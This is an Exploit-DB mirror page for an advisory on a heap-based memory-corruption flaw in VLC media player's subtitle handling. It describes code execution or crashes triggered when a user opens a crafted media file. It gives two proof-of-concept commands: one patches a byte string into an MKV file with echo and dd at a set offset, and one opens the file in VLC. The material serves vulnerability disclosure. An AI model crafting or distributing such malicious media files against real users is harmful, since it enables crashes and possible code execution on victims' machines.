exploit-db-mirror/exploits/multiple/dos/16108.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

13 lines
No EOL
675 B
Text

Source: https://www.securityfocus.com/bid/46008/info
VLC media player is prone to a heap-based memory-corruption vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
An attacker can exploit this issue by enticing an unsuspecting user to open a malicious media file containing malicious subtitles with the vulnerable application.
The following proof-of-concept commands are available:
1. echo -ne '<foo\0crashme' | dd conv=notrunc bs=1 seek=877862 \ of=refined-australia-blu720p-sample.mkv
2. vlc --sub-language English refined-australia-blu720p-sample.mkv